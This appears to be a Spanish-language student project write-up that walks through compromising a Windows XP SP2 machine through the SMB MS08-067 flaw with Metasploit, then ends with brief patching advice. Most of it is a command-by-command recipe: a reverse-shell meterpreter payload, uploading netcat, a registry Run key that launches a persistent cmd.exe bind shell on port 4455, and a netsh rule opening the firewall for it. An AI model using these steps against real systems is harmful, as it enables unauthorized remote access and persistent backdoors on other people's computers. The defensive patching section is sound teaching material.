Integrantes :

Jeferson Bohorquez

Maria Isabel Pinos

Sheyla Salazar

Nadia Flores

Dolores Tomala

Karina Sarmiento

Antecedente

Demostrar las vulnerabilidades de algunos sistemas operativos y nosotros como Ing. En sistemas tomar las respectivas precauciones para no caer en este tipo de problemas

Objetivo

Realizar un ataque utilizando un software para poder dejar un acceso en el equipo víctima y poder acceder en el momento que desee el atacante

Pasos Previos para realizar el ataque e instalar un Backdoor  (Puerta Trasera)

1.- Ubicar la Victima (En este caso utilizaremos una PC con Windows XP SP2)

2.- Conocer la Ip del Equipo o Nombre del PC Victima

3.- Tener a la Mano una Distribución de BackTrack con la Cual Realizaremos el Ataque

4.- si contamos con lo anterior Procederemos a realizar el ataque

Lo primeros que tendremos que hacer es cambiarnos al directorio de los Framework3 .

Para esto abrimos una consola de texto y con el comando cd nos ubicamos en la ruta mencionado de la siguiente manera :

Cd  /pentest/exploits/framework3

Una vez que nos encontramos en el directorio ejecutamos la consola del metasploit

Como indico acontinuacion :

./msfconsole

Ya dentro de la consola podemos escoger los exploits con los cuales vamos a realizar el ataque en este caso utilizaremos la vulnerabilidad del protocolo SMB de Windows por lo cual vamos a seleccionar el exploits que altera esta vulnerabilidad: windows/smb/ms08_067_netapi

Para seleccionarlo tendremos que utilizar el comando use como se muestra a continuación:

use windows/smb/ms08_067_netapi

Seteamos las Ip del los equipos, tanto remoto (victima) y local (Atacante) del la siguiente manera

Para setear la ip del equipo Remoto (Victima)

Set RHOST 192.168.x.x Esta ip la debemos conocer previamente

Para setear la ip local (Atacante)

Set LHOST 192.168.x.x Es la Ip de nuestro Backtrack

Setemos estas configuración

set PAYLOAD windows/meterpreter/reverse_tcp

ya estamos listos para realizar con el comando exploit

Ahora tendremos que pasar el ejecutable de netcat

Con el siguiente comando

Upload /root/nc.exe c:\\repa\\

Ok ya subimos el archivo que nos abrirá la puerta en Windows, ahora escribiremos en el registro para hacer que este se ejecuta cada vez que se inicie en sistema operativo de la víctima como se indica :

Ejemplo :

reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v sys -d “c:\\respa\\nc.exe -Ldp 4455 -e cmd.exe”

ejecutamos la consola DOS del equipo victima asi :

execute –f cmd –i

Liberamos el puerto de acceso en el firewall

netsh firewall add portopening TCP 4455 “service fire” ENABLE ALL

Reiniciamos la pc Victima con el commando reboot

Y listo podemos conectarnos directamente por el puerto 4455 como observamos a continuación

Conclusión

Una vez realizado el ataque podemos entender el riesgo al que estamos expuestos y esto nos lleva a poner un poco mas de atención en lo que se refiere a seguridad informática para nuestra Organización o PC

A continuacion el video que demuestra la efectividad del ataque

Ahora les Mostraremos como Hacer a Windows Indestructible frente a esta vulnerabilidad

Antecedente:

Muchas veces existen personas que simplemente deshabilitan la opción de carpetas compartidas pero eso no es un certificación de que alguna persona pueda accede a mi máquina.

                                                                                                        

                                                                                                   Objetivo:                                                                                                  

Hacer  a Windows seguro frente a ataques con BackTrack Utilizando el protocolo SMB

Pasos a seguir:

– Instalar el Service pack3.

– Instalar el paquete que cubre la vulnerabilidad del protocolo SMB (WindowsXP-KB958644-x86-ESN)

– Una vez instalado el parche que cubre la vulnerabilidad realizamos los pasos de ataque de Backdor para verificar que se aplicaron las seguridades pera este.

A continuacion se demuestra la efectividad de lo explicado